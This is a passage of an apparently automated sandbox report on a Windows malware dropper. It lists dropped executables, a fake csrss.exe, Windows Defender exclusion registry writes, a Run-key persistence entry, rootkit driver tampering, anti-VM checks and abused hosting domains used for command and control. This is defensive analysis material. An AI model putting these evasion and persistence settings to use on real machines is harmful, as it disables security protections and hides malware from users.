N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J39I9.tmp\Wed101f2195049.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a0affb29d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1015ba90d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1015ba90d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a0affb29d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1001440e7e09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1001440e7e09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Binary Proxy Execution: Odbcconf

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\odbcconf.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\HolyMoon = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Wed1095e8d3cef4ec773.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\HolyMoon = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Gparted\is-TD94V.tmp C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259474200 C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.sfx.exe C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\gimagex.exe C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-TVQH3.tmp C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Program Files (x86)\Gparted\is-PVT77.tmp C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20241107052124.cab C:\Windows\system32\makecab.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Gparted\Build.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-J39I9.tmp\Wed101f2195049.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10520e75c2eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1001440e7e09.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10a0affb29d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10b607271059cb7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-NADBA.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1015ba90d2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\rss\csrss.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed106168c8ce90b57b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed101f2195049.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\odbcconf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed109189c07b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\gimagex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
